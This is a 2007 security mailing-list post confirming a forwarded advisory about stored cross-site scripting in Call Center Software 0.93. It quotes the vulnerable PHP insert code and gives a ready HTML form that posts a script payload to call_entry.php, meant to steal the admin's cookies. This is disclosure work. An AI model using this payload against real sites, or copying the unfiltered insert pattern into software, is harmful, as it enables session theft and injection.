[VIM] [TRUE] Call Center Software - Remote Xss Post Exploit -
Noam Rathaus
noamr at beyondsecurity.com
Thu Feb 22 05:55:58 EST 2007
Hi,
Looks real (code):
$problem_desc = $_POST['problem_desc'];
if(strlen($name) > 0 && strlen($problem_desc) > 0){
$sql = "insert into calls (call_date, name, phone, department_id,
issue_id, problem_desc) values ";
$sql .= "('$today', '$name', '$phone', '$department_id', '$issue_id', '$problem_desc')";
mysql_query($sql);
Meaning that problem_desc is inserted without any kind of filtering, and read
without any kind of filtering.
---------- Forwarded Message ----------
Subject: Call Center Software - Remote Xss Post Exploit -
Date: Wednesday 21 February 2007 21:23
From: corrado.liotta at alice.it
To: bugtraq at securityfocus.com
-=[--------------------ADVISORY-------------------]=-
Call center 0,93
Author: CorryL [corryl80 at gmail.com]
-=[-----------------------------------------------]=-
-=[+] Application: Call senter
-=[+] Version: 0,93
-=[+] Vendor's URL: http://www.call-center-software.org/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Cross-Site Script
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.xoned.net
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck
..::[ Descriprion ]::..
Call center software is one of the most important aspects of any call help
center, being able to track and manage calls can be the key to high customer
safisfacation. Our 100% free call center software solution is based on php
and the mysql database.
..::[ Bug ]::..
An attacker exploiting this vulnerability is able steal the content
the cookies of the consumer admin in fact the bug situated is on an request
post then he remains memorized inside the database in attends him that the
admin goes to read the content of the call
..::[Exploit]::..
<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">
</head>
<body>
<table bgcolor="#FFFFFF" width="100%">
<tr>
<td align="center">
<form method="post" action="http://remote_server/path/call_entry.php">
<table border="0">
<tr>
<th class="ttitle">Adding Call</th>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="3">
<tr>
<td align="right">Name: </td><td align="left"><input type="text"
name="name" Value="H4ck3r"size="30"></td> </tr>
<tr>
<td align="right">Phone: </td><td align="left"><input
type="text" name="phone" value="111-555-555" size="20"></td> </tr>
<tr>
<td align="right">Department: </td>
<td>
<select name="department_id">
<option value="1">Problem</option> </select>
</td>
</tr>
<tr>
<td align="right">Issue Type: </td>
<td>
<select name="issue_id">
<option value="6">email</option>
<option value="2">keyboard</option>
<option value="3">monitor</option>
<option value="5">mouse</option>
<option value="4">network</option>
<option value="8">password</option>
<option value="7">word processing</option>
</select>
</td>
</tr>
<tr>
<td align="right" valign="top">Xss Script Here : </td>
<td align="left"><input type="text" name="problem_desc" value="<body
onload=alert(1395499912)>" size="50"></td> </tr>
<tr>
<td> </td><td><input type="submit" name="submit" value="Add"
class="button"></td> </tr>
</table>
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</body>
</html>
-------------------------------------------------------
--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
More information about the VIM
mailing list